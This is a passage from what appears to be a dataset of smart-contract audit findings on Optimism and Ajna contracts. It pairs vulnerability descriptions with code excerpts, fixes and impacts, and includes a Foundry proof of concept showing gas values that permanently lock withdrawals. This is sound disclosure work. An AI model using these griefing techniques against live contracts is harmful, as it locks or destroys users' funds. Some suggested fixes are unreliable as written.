Include this list when prechecking withdrawals to ensure that they are included in the storage slot matching process, but not included in withdrawals to be transferred to the new system.\\nSpecial note\\nAfter coming up with this attack, we've noticed that someone has done exactly what we described and sent a message directly to the MessagePasser! Obviously this TX has nothing to do with us and we want to make sure Optimism is absolutely safe during migration. Furthermore, this TX should be traced and if a contestant is linked to this then they should clearly be disqualified from being rewarded.чExploitation of this bug would lead to significant challenges for the Optimism team, needing to run a less tested migration process (which could lead to further issues), and a significant amount of FUD in pausing a partially completed migration partway through. We think that the ability to unexpectedly shut down the migration causes enough structural damage as well as second-order financial damage to warrant high severity.ч```\\nif addr == dump.MessagePasserAddress {\\n statedumper.WriteMessage(caller.Address(), input)\\n}\\n```\\n -Withdrawals with high gas limits can be bricked by a malicious user, permanently locking fundsчhighчTransactions to execute a withdrawal from the Optimism Portal require the caller to send enough gas to cover `gasLimit` specified by the withdrawer.\\nBecause the EVM limits the total gas forwarded on to 63/64ths of the total `gasleft()` (and silently reduces it to this value if we try to send more) there are situations where transactions with high gas limits will be vulnerable to being reverted.\\nBecause there are no replays on this contract, the result is that a malicious user can call `finalizeWithdrawalTransaction()` with a precise amount of gas, cause the withdrawer's withdrawal to fail, and permanently lock their funds.\\nWithdrawals can be withdrawn from L2's `L2ToL1MessagePasser` contract to L1's `OptimismPortal` contract. 
This is a less \"user-friendly\" withdrawal path, presumably for users who know what they are doing.\\nOne of the quirks of the `OptimismPortal` is that there is no replaying of transactions. If a transaction fails, it will simply fail, and all ETH associated with it will remain in the `OptimismPortal` contract. Users have been warned of this and understand the risks, so Optimism takes no responsibility for user error.\\nIn order to ensure that failed transactions can only happen at the fault of the user, the contract implements a check to ensure that the gasLimit is sufficient:\\n```\\nrequire(\\n gasleft() >= _tx.gasLimit + FINALIZE_GAS_BUFFER,\\n \"OptimismPortal: insufficient gas to finalize withdrawal\"\\n);\\n```\\n\\nWhen the transaction is executed, the contract requests to send along all the remaining gas, minus the hardcoded `FINALIZE_GAS_BUFFER` for actions after the call. The goal is that this will ensure that the amount of gas forwarded on is at least the gas limit specified by the user.\\nOptimism is aware of the importance of this property being correct when they write in the comments:\\n“We want to maintain the property that the amount of gas supplied to the call to the target contract is at least the gas limit specified by the user. We can do this by enforcing that, at this point in time, we still have gaslimit + buffer gas available.”\\nThe issue is that the EVM specifies the maximum gas that can be sent to an external call as 63/64ths of the `gasleft()`. For very large gas limits, this 1/64th that remains could be greater than the hardcoded FINALIZE_GAS_BUFFER value. 
In this case, less gas would be forwarded along than was directed by the contract.\\nHere is a quick overview of the math:\\nWe need X gas to be sent as a part of the call.\\nThis means we need `X * 64 / 63` gas to be available at the time the function is called.\\nHowever, the only check is that we have `X + 20_000` gas a few operations prior to the call (which guarantees that we have `X + 14878` at the time of the call).\\nFor any situation where `X / 64 > 14878` (in other words, when the amount of gas sent is greater than 952_192), the caller is able to send an amount of gas that passes the check, but doesn't forward the required amount on in the call.чChange the check to account for this 63/64 rule:\\n```\\nrequire(\\n gasleft() >= (_tx.gasLimit + FINALIZE_GAS_BUFFER) * 64 / 63,\\n \"OptimismPortal: insufficient gas to finalize withdrawal\"\\n);\\n```\\nчFor any withdrawal with a gas limit of at least 952,192, a malicious user can call `finalizeWithdrawalTransaction()` with an amount of gas that will pass the checks, but will end up forwarding along less gas than was specified by the user.\\nThe result is that the withdrawing user can have their funds permanently locked in the `OptimismPortal` contract.\\nProof of Concept\\nTo test this behavior in a sandboxed environment, you can copy the following proof of concept.\\nHere are three simple contracts that replicate the behavior of the Portal, as well as an external contract that uses a predefined amount of gas.\\n(Note that we added 5122 to the gas included in the call to correct for the other bug we submitted, as this issue remains even when the other bug is patched.)\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nlibrary SafeCall {\\n /**\\n * @notice Perform a low level call without copying any returndata\\n *\\n * @param _target Address to call\\n * @param _gas Amount of gas to pass to the call\\n * @param _value Amount of value to pass to the call\\n * @param _calldata 
Calldata to pass to the call\\n */\\n function call(\\n address _target,\\n uint256 _gas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n assembly {\\n _success := call(\\n _gas, // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 0x20), // inloc\\n mload(_calldata), // inlen\\n 0, // outloc\\n 0 // outlen\\n )\\n }\\n return _success;\\n }\\n}\\n\\ncontract GasUser {\\n uint[] public s;\\n\\n function store(uint i) public {\\n for (uint j = 0; j < i; j++) {\\n s.push(1);\\n }\\n }\\n}\\n\\ncontract Portal {\\n address l2Sender;\\n\\n struct Transaction {\\n uint gasLimit;\\n address sender;\\n address target;\\n uint value;\\n bytes data;\\n }\\n\\n constructor(address _l2Sender) {\\n l2Sender = _l2Sender;\\n }\\n\\n function execute(Transaction memory _tx) public {\\n require(\\n gasleft() >= _tx.gasLimit + 20000,\\n \"OptimismPortal: insufficient gas to finalize withdrawal\"\\n );\\n\\n // Set the l2Sender so contracts know who triggered this withdrawal on L2.\\n l2Sender = _tx.sender;\\n\\n // Trigger the call to the target contract. 
We use SafeCall because we don't\\n // care about the returndata and we don't want target contracts to be able to force this\\n // call to run out of gas via a returndata bomb.\\n bool success = SafeCall.call(\\n _tx.target,\\n gasleft() - 20000 + 5122, // fix for other bug\\n _tx.value,\\n _tx.data\\n );\\n }\\n}\\n```\\n\\nHere is a Foundry test that calls the Portal with various gas values to expose this vulnerability:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"../src/Portal.sol\";\\n\\ncontract PortalGasTest is Test {\\n Portal public c;\\n GasUser public gu;\\n\\n function setUp() public {\\n c = new Portal(0x000000000000000000000000000000000000dEaD);\\n gu = new GasUser();\\n }\\n\\n function testGasLimitForGU() public {\\n gu.store{gas: 11_245_655}(500);\\n assert(gu.s(499) == 1);\\n }\\n\\n function _executePortalWithGivenGas(uint gas) public {\\n c.execute{gas: gas}(Portal.Transaction({\\n gasLimit: 11_245_655,\\n sender: address(69),\\n target: address(gu),\\n value: 0,\\n data: abi.encodeWithSignature(\"store(uint256)\", 500)\\n }));\\n }\\n\\n function testPortalCatchesGasTooSmall() public {\\n vm.expectRevert(bytes(\"OptimismPortal: insufficient gas to finalize withdrawal\"));\\n _executePortalWithGivenGas(11_266_734);\\n }\\n\\n function testPortalSucceedsWithEnoughGas() public {\\n _executePortalWithGivenGas(11_433_180);\\n assert(gu.s(499) == 1);\\n }\\n\\n function testPortalBugWithInBetweenGasLow() public {\\n _executePortalWithGivenGas(11_266_735);\\n \\n // It now reverts because the array has a length of 0.\\n vm.expectRevert();\\n gu.s(0);\\n }\\n\\n function testPortalBugWithInBetweenGasHigh() public {\\n _executePortalWithGivenGas(11_433_179);\\n \\n // It now reverts because the array has a length of 0.\\n vm.expectRevert();\\n gu.s(0);\\n }\\n}\\n```\\n\\nAs you can see:\\nWe verify that the call to the target contract succeeds with 11,245,655 gas, and set that 
as gasLimit for all tests. This is the `X` from our formula above.\\nThis means that we need `11_245_655 * 64 / 63 = 11_424_157` gas available at the time the call is made.\\nThe test uses `9023` gas before it makes our call, so we can see that if we send `11_424_157 + 9_023 = 11_433_180` gas, the test passes.\\nSimilarly, if we send `11_266_734` gas, the total gas will be small enough to fail the require check.\\nBut in the sweet spot between these values, we have enough gas to pass the require check, but when we get to the call, the amount of gas requested is more than 63/64ths of the total, so the EVM sends less than we asked for. As a result, the transaction fails.ч```\\nrequire(\\n gasleft() >= _tx.gasLimit + FINALIZE_GAS_BUFFER,\\n \"OptimismPortal: insufficient gas to finalize withdrawal\"\\n);\\n```\\n -Challenger can override the 7 day finalization periodчmediumчAll withdrawals are finalized after a 7 days window (finalization period). After this duration transaction are confirmed and user can surely withdraw their balance. But due to lack of check, challenger can delete a l2Output which is older than 7 days meaning withdrawals will stop working for even confirmed transaction\\nProposer has proposed L2 output for a _l2BlockNumber which creates entries on l2Outputs using the proposeL2Output. 
Assume this creates a new l2Output at index X\\n```\\nl2Outputs.push(\\n Types.OutputProposal({\\n outputRoot: _outputRoot,\\n timestamp: uint128(block.timestamp),\\n l2BlockNumber: uint128(_l2BlockNumber)\\n })\\n );\\n```\\n\\nproveWithdrawalTransaction has been called for user linked to this l2Output\\nFinalization period(7 day) is over after proposal and Users is ready to call `finalizeWithdrawalTransaction` to withdraw their funds\\nSince confirmation is done, User A is sure that he will be able to withdraw and thinks to do it after coming back from his holidays\\nChallenger tries to delete the index X (Step 1), ideally it should not be allowed as already confirmed. But since there is no such timeline check so the l2Output gets deleted\\n```\\nfunction deleteL2Outputs(uint256 _l2OutputIndex) external {\\n require(\\n msg.sender == CHALLENGER,\\n \"L2OutputOracle: only the challenger address can delete outputs\"\\n );\\n\\n // Make sure we're not *increasing* the length of the array.\\n require(\\n _l2OutputIndex < l2Outputs.length,\\n \"L2OutputOracle: cannot delete outputs after the latest output index\"\\n );\\n\\n uint256 prevNextL2OutputIndex = nextOutputIndex();\\n\\n // Use assembly to delete the array elements because Solidity doesn't allow it.\\n assembly {\\n sstore(l2Outputs.slot, _l2OutputIndex)\\n }\\n\\n emit OutputsDeleted(prevNextL2OutputIndex, _l2OutputIndex);\\n }\\n```\\n\\nUser comes back and now tries to withdraw but the withdraw fails since the l2Output index X does not exist anymore. This is incorrect and nullifies the network guarantee.\\nNote: In case of a separate output root could be proven then user withdrawal will permanently stuck. 
Ideally if such anomaly could not be caught within finalization period then user should be allowed to withdrawчAdd below check in\\n```\\nrequire(getL2Output(_l2OutputIndex).timestamp<=FINALIZATION_PERIOD_SECONDS, \"Output already confirmed\");\\n```\\nчWithdrawal will fail for confirmed transactionч```\\nl2Outputs.push(\\n Types.OutputProposal({\\n outputRoot: _outputRoot,\\n timestamp: uint128(block.timestamp),\\n l2BlockNumber: uint128(_l2BlockNumber)\\n })\\n );\\n```\\n -user can drawDebt that is below dust amountчmediumчAccording to the protocol, drawDebt prevents user from drawing below the `quoteDust_` amount. However, a logical error in the code can allow user to draw below dust amount.\\n`_revertOnMinDebt` is used in `drawDebt` to prevent dust loans. As you can see, the protocol wants to take the average of debt in the pool and make it the minimum if there are 10 or more loans. If it is lower than 10 loans, a `quoteDust` is used as the minimum. There is an edge case, whereby there are 10 loans in the pool, and the borrowers repay the loans till there is only 1 unit owed for each loan.(Might revert due to rounding error but it is describing a situation whereby repaying till a low amount of poolDebt can enable this). 
A new borrower can then `drawDebt` and because `_revertOnMindebt` only goes through the average loan amount check and not the `quoteDust_` amount check, he/she is able to draw loan that is well below the `quoteDust_` amount.\\n```\\n function _revertOnMinDebt(\\n LoansState storage loans_,\\n uint256 poolDebt_,\\n uint256 borrowerDebt_,\\n uint256 quoteDust_\\n ) view {\\n if (borrowerDebt_ != 0) {\\n uint256 loansCount = Loans.noOfLoans(loans_);\\n if (loansCount >= 10) {\\n if (borrowerDebt_ < _minDebtAmount(poolDebt_, loansCount)) revert AmountLTMinDebt();\\n } else {\\n if (borrowerDebt_ < quoteDust_) revert DustAmountNotExceeded();\\n }\\n }\\n }\\n```\\n\\n```\\n function _minDebtAmount(\\n uint256 debt_,\\n uint256 loansCount_\\n ) pure returns (uint256 minDebtAmount_) {\\n if (loansCount_ != 0) {\\n minDebtAmount_ = Maths.wdiv(Maths.wdiv(debt_, Maths.wad(loansCount_)), 10**19);\\n }\\n }\\n```\\nчIssue user can drawDebt that is below dust amount\\nRecommend checking that loan amount is more than `quoteDust_` regardless of the loan count.\\n```\\n function _revertOnMinDebt(\\n LoansState storage loans_,\\n uint256 poolDebt_,\\n uint256 borrowerDebt_,\\n uint256 quoteDust_\\n ) view {\\n if (borrowerDebt_ != 0) {\\n uint256 loansCount = Loans.noOfLoans(loans_);\\n if (loansCount >= 10) {\\n if (borrowerDebt_ < _minDebtAmount(poolDebt_, loansCount)) revert AmountLTMinDebt();\\n } \\n if (borrowerDebt_ < quoteDust_) revert DustAmountNotExceeded();\\n \\n }\\n }\\n```\\nчA minimum loan amount is used to deter dust loans, which can diminish user experience.ч```\\n function _revertOnMinDebt(\\n LoansState storage loans_,\\n uint256 poolDebt_,\\n uint256 borrowerDebt_,\\n uint256 quoteDust_\\n ) view {\\n if (borrowerDebt_ != 0) {\\n uint256 loansCount = Loans.noOfLoans(loans_);\\n if (loansCount >= 10) {\\n if (borrowerDebt_ < _minDebtAmount(poolDebt_, loansCount)) revert AmountLTMinDebt();\\n } else {\\n if (borrowerDebt_ < quoteDust_) revert 
DustAmountNotExceeded();\\n }\\n }\\n }\\n```\\n -CryptoKitty and CryptoFighter NFT can be paused, which block borrowing / repaying / liquidating action in the ERC721Pool when borrowers still forced to pay the compounding interestчmediumчCryptoKitty and CryptoFighter NFT can be paused, which block borrowing / repaying / liquidating action in the ERC721Pool\\nIn the current implementation in the factory contract and the pool contract, special logic is in-place to handle non-standard NFT such as crypto-kitty, crypto-figher or crypto punk.\\nIn the factory contract:\\n```\\nNFTTypes nftType;\\n// CryptoPunks NFTs\\nif (collateral_ == 0xb47e3cd837dDF8e4c57F05d70Ab865de6e193BBB ) {\\n nftType = NFTTypes.CRYPTOPUNKS;\\n}\\n// CryptoKitties and CryptoFighters NFTs\\nelse if (collateral_ == 0x06012c8cf97BEaD5deAe237070F9587f8E7A266d || collateral_ == 0x87d598064c736dd0C712D329aFCFAA0Ccc1921A1) {\\n nftType = NFTTypes.CRYPTOKITTIES;\\n}\\n// All other NFTs that support the EIP721 standard\\nelse {\\n // Here 0x80ac58cd is the ERC721 interface Id\\n // Neither a standard NFT nor a non-standard supported NFT(punk, kitty or fighter)\\n try IERC165(collateral_).supportsInterface(0x80ac58cd) returns (bool supportsERC721Interface) {\\n if (!supportsERC721Interface) revert NFTNotSupported();\\n } catch {\\n revert NFTNotSupported();\\n }\\n\\n nftType = NFTTypes.STANDARD_ERC721;\\n}\\n```\\n\\nAnd in ERC721Pool When handling ERC721 token transfer:\\n```\\n/**\\n * @notice Helper function for transferring multiple NFT tokens from msg.sender to pool.\\n * @notice Reverts in case token id is not supported by subset pool.\\n * @param poolTokens_ Array in pool that tracks NFT ids (could be tracking NFTs pledged by borrower or NFTs added by a lender in a specific bucket).\\n * @param tokenIds_ Array of NFT token ids to transfer from msg.sender to pool.\\n */\\nfunction _transferFromSenderToPool(\\n uint256[] storage poolTokens_,\\n uint256[] calldata tokenIds_\\n) internal {\\n bool 
subset = _getArgUint256(SUBSET) != 0;\\n uint8 nftType = _getArgUint8(NFT_TYPE);\\n\\n for (uint256 i = 0; i < tokenIds_.length;) {\\n uint256 tokenId = tokenIds_[i];\\n if (subset && !tokenIdsAllowed[tokenId]) revert OnlySubset();\\n poolTokens_.push(tokenId);\\n\\n if (nftType == uint8(NFTTypes.STANDARD_ERC721)){\\n _transferNFT(msg.sender, address(this), tokenId);\\n }\\n else if (nftType == uint8(NFTTypes.CRYPTOKITTIES)) {\\n ICryptoKitties(_getArgAddress(COLLATERAL_ADDRESS)).transferFrom(msg.sender ,address(this), tokenId);\\n }\\n else{\\n ICryptoPunks(_getArgAddress(COLLATERAL_ADDRESS)).buyPunk(tokenId);\\n }\\n\\n unchecked { ++i; }\\n }\\n}\\n```\\n\\nand\\n```\\nuint8 nftType = _getArgUint8(NFT_TYPE);\\n\\nfor (uint256 i = 0; i < amountToRemove_;) {\\n uint256 tokenId = poolTokens_[--noOfNFTsInPool]; // start with transferring the last token added in bucket\\n poolTokens_.pop();\\n\\n if (nftType == uint8(NFTTypes.STANDARD_ERC721)){\\n _transferNFT(address(this), toAddress_, tokenId);\\n }\\n else if (nftType == uint8(NFTTypes.CRYPTOKITTIES)) {\\n ICryptoKitties(_getArgAddress(COLLATERAL_ADDRESS)).transfer(toAddress_, tokenId);\\n }\\n else {\\n ICryptoPunks(_getArgAddress(COLLATERAL_ADDRESS)).transferPunk(toAddress_, tokenId);\\n }\\n\\n tokensTransferred[i] = tokenId;\\n\\n unchecked { ++i; }\\n}\\n```\\n\\nnote if the NFT address is classified as either crypto kitties or crypto fighers, then the NFT type is classified as CryptoKitties, then transfer and transferFrom method is triggered.\\n```\\nif (nftType == uint8(NFTTypes.CRYPTOKITTIES)) {\\n ICryptoKitties(_getArgAddress(COLLATERAL_ADDRESS)).transferFrom(msg.sender ,address(this), tokenId);\\n }\\n```\\n\\nand\\n```\\nelse if (nftType == uint8(NFTTypes.CRYPTOKITTIES)) {\\n ICryptoKitties(_getArgAddress(COLLATERAL_ADDRESS)).transfer(toAddress_, tokenId);\\n}\\n```\\n\\nHowever, in both crypto-kitty and in crypto-figher NFT, the transfer and transferFrom method can be paused.\\nIn crypto-figher 
NFT:\\n```\\nfunction transferFrom(\\n address _from,\\n address _to,\\n uint256 _tokenId\\n)\\n public\\n whenNotPaused\\n{\\n```\\n\\nIn Crypto-kitty NFT:\\n```\\nfunction transferFrom(\\n address _from,\\n address _to,\\n uint256 _tokenId\\n)\\n external\\n whenNotPaused\\n{\\n```\\n\\nNote the whenNotPaused modifier.чIssue CryptoKitty and CryptoFighter NFT can be paused, which block borrowing / repaying / liquidating action in the ERC721Pool when borrowers still forced to pay the compounding interest\\nInterest should not be charged to the borrower while the external contract has paused transfer and transferFrom.чIf transfer and transferFrom are paused in the CryptoKitty and CryptoFighter NFT, the borrowing, repaying and liquidating actions are blocked in the ERC721Pool, so the user cannot fully clear his debt and has to keep paying the compounding interest while the transfer is paused.ч```\\nNFTTypes nftType;\\n// CryptoPunks NFTs\\nif (collateral_ == 0xb47e3cd837dDF8e4c57F05d70Ab865de6e193BBB ) {\\n nftType = NFTTypes.CRYPTOPUNKS;\\n}\\n// CryptoKitties and CryptoFighters NFTs\\nelse if (collateral_ == 0x06012c8cf97BEaD5deAe237070F9587f8E7A266d || collateral_ == 0x87d598064c736dd0C712D329aFCFAA0Ccc1921A1) {\\n nftType = NFTTypes.CRYPTOKITTIES;\\n}\\n// All other NFTs that support the EIP721 standard\\nelse {\\n // Here 0x80ac58cd is the ERC721 interface Id\\n // Neither a standard NFT nor a non-standard supported NFT(punk, kitty or fighter)\\n try IERC165(collateral_).supportsInterface(0x80ac58cd) returns (bool supportsERC721Interface) {\\n if (!supportsERC721Interface) revert NFTNotSupported();\\n } catch {\\n revert NFTNotSupported();\\n }\\n\\n nftType = NFTTypes.STANDARD_ERC721;\\n}\\n```\\n -`moveQuoteToken()` can cause bucket to go bankrupt but it is not reflected in the accountingчhighчBoth `removeQuoteToken()` and `moveQuoteToken()` can be used to completely remove all quote tokens from a bucket. 
When this happens, if at the same time `bucketCollateral == 0 && lpsRemaining != 0`, then the bucket should be declared bankrupt. This update is done in `removeQuoteToken()` but not in `moveQuoteToken()`.\\n`removeQuoteToken()` has the following check to update bankruptcy time when collateral and quote token remaining is 0, but lps is more than 0. `moveQuoteToken()` is however missing this check. Both this functions has the same effects on the `fromBucket` and the only difference is that `removeQuoteToken()` returns the token to `msg.sender` but `moveQuoteToken()` moves the token to another bucket.\\n```\\nif (removeParams.bucketCollateral == 0 && unscaledRemaining == 0 && lpsRemaining != 0) {\\n emit BucketBankruptcy(params_.index, lpsRemaining);\\n bucket.lps = 0;\\n bucket.bankruptcyTime = block.timestamp;\\n} else {\\n bucket.lps = lpsRemaining;\\n}\\n```\\nчIssue `moveQuoteToken()` can cause bucket to go bankrupt but it is not reflected in the accounting\\nWe should check if a bucket is bankrupt after moving quote tokens.чA future depositor to the bucket will get less lps than expected due to depositing in a bucket that is supposedly bankrupt, hence the lps they get will be diluted with the existing ones in the bucket.ч```\\nif (removeParams.bucketCollateral == 0 && unscaledRemaining == 0 && lpsRemaining != 0) {\\n emit BucketBankruptcy(params_.index, lpsRemaining);\\n bucket.lps = 0;\\n bucket.bankruptcyTime = block.timestamp;\\n} else {\\n bucket.lps = lpsRemaining;\\n}\\n```\\n -The deposit / withdraw / trade transaction lack of expiration timestamp check and slippage controlчhighчThe deposit / withdraw / trade transaction lack of expiration timestamp and slippage control\\nLet us look into the heavily forked Uniswap V2 contract addLiquidity function implementation\\n```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) 
internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n\\nthe implementation has two point that worth noting,\\nthe first point is the deadline check\\n```\\nmodifier ensure(uint deadline) {\\n require(deadline >= block.timestamp, 'UniswapV2Router: EXPIRED');\\n _;\\n}\\n```\\n\\nThe transaction can be pending in mempool for a long and the trading activity is very time 
sensitive. Without a deadline check, the trade transaction can be executed a long time after the user submits the transaction; at that time, the trade can be done at a sub-optimal price, which harms the user's position.\\nThe deadline check ensures that the transaction can be executed on time and that an expired transaction reverts.\\nThe second point is the slippage control:\\n```\\nrequire(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n```\\n\\nand\\n```\\nrequire(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n```\\n\\nThe slippage control ensures the user receives at least the minimum amount of the token they want to trade.\\nIn the current implementation, neither the deadline check nor the slippage control is in place when users deposit / withdraw / trade.чIssue The deposit / withdraw / trade transaction lack of expiration timestamp check and slippage control\\nWe recommend the protocol add a deadline check and slippage control.чAccording to the whitepaper:\\nDeposits in the highest priced buckets offer the highest valuations on collateral, and hence offer the most liquidity to borrowers. They are also the first buckets that could be used to purchase collateral if a loan were to be liquidated (see 7.0 LIQUIDATIONS). We can think of a bucket's deposit as being utilized if the sum of all deposits in buckets priced higher than it is less than the total debt of all borrowers in the pool. The lowest price among utilized buckets or “lowest utilized price” is called the LUP. 
If we were to pair off lenders with borrowers, matching the highest priced lenders' deposits with the borrowers' debts in equal quantities, the LUP would be the price of the marginal (lowest priced and therefore least aggressive) lender thus matched (usually, there would be a surplus of lenders that were not matched, corresponding to less than 100% utilization of the pool).\\nThe LUP plays a critical role in Ajna: a borrower who is undercollateralized with respect to the LUP (i.e. with respect to the marginal utilized lender) is eligible for liquidation. Conversely, a lender cannot withdraw deposit if doing so would move the LUP down so far as to make some active loans eligible for liquidation. In order to withdraw quote token in this situation, the lender must first kick the loans in question.\\nBecause the deadline check is missing,\\nAfter a lender submit a transaction and want to add the token into Highest price busket to make sure the quote token can be borrowed out and generate yield.\\nHowever, the transaction is pending in the mempool for a very long time.\\nBorrower create more debt and other lender's add and withdraw quote token before the lender's transaction is executed.\\nAfter a long time later, the lender's transaction is executed.\\nThe lender find out that the highest priced bucket moved and the lender cannot withdraw his token because doing would move the LUP down eligible for liquidiation.\\nAccording to the whitepaper:\\n6.1 Trading collateral for quote token\\nDavid owns 1 ETH, and would like to sell it for 1100 DAI. He puts the 1 ETH into the 1100 bucket as claimable collateral (alongside Carol's 20000 deposit), minting 1100 in LPB in return. He can then redeem that 1100 LPB for quote token, withdrawing 1100 DAI. Note: after David's withdrawal, the LUP remains at 1100. 
If the book were different such that his withdrawal would move the LUP below Bob's threshold price of 901.73, he would not be able to withdraw all of the DAI.\\nThe case above is ideal, however, because the deadline check is missing, and there is no slippage control, the transactoin can be pending for a long time and by the time the trade transaction is lended, the withdraw amount can be less than 1100 DAI.\\nAnother example for lack of slippage, for example, the function below is called:\\n```\\n/// @inheritdoc IPoolLenderActions\\nfunction removeQuoteToken(\\n uint256 maxAmount_,\\n uint256 index_\\n) external override nonReentrant returns (uint256 removedAmount_, uint256 redeemedLPs_) {\\n _revertIfAuctionClearable(auctions, loans);\\n\\n PoolState memory poolState = _accruePoolInterest();\\n\\n _revertIfAuctionDebtLocked(deposits, poolBalances, index_, poolState.inflator);\\n\\n uint256 newLup;\\n (\\n removedAmount_,\\n redeemedLPs_,\\n newLup\\n ) = LenderActions.removeQuoteToken(\\n buckets,\\n deposits,\\n poolState,\\n RemoveQuoteParams({\\n maxAmount: maxAmount_,\\n index: index_,\\n thresholdPrice: Loans.getMax(loans).thresholdPrice\\n })\\n );\\n\\n // update pool interest rate state\\n _updateInterestState(poolState, newLup);\\n\\n // move quote token amount from pool to lender\\n _transferQuoteToken(msg.sender, removedAmount_);\\n}\\n```\\n\\nwithout specificing the minReceived amount, the removedAmount can be very small comparing to the maxAmount user speicifced.ч```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = 
UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n -Adversary can grief kicker by frontrunning kickAuction call with a large amount of loanчmediumчAverage debt size of the pool is used to calculated MOMP (Most optimistic matching price), which is used to derive NP (neutral price). Higher average debt size will result in lower MOMP and hence lower NP which will make it harder for kicker to earn a reward and more likely that the kicker is penalized. 
An adversary can manipulate the average debt size of the pool by frontrunning kicker's `kickAuction` call with a large amount of loan.\\nNP (neutral price) is a price that will be used to decide whether to reward a kicker with a bonus or punish the kicker with a penalty. In the event the auction ends with a price higher than NP, kicker will be given a penalty and if the auction ends with a price lower than NP, kicker will be rewarded with a bonus.\\nNP is derived from MOMP (Most optimistic matching price). BI refers to borrower inflator. Quoted from the whitepaper page 17, When a loan is initiated (the first debt or additional debt is drawn, or collateral is removed from the loan), the neutral price is set to the current MOMP times the ratio of the loan's threshold price to the LUP, plus one year's interest. As time passes, the neutral price increases at the same rate as interest. This can be expressed as the following formula for the neutral price as a function of time 𝑡, where 𝑠 is the time the loan is initiated.\\n```\\n NP_t = (1 + rate_s) * MOMP_s * TP_s * \\frac{TP_s}{LUP_s} * \\frac{BI_s}{BI_t}\\n```\\n\\nTherefore the lower the MOMP, the lower the NP. Lower NP will mean that kicker will be rewarded less and punished more compared to a higher NP. Quoted from the white paper, The MOMP, or “most optimistic matching price,” is the price at which a loan of average size would match with the most favorable lenders on the book. Technically, it is the highest price for which the amount of deposit above it exceeds the average loan debt of the pool. In `_kick` function, MOMP is calculated as this. 
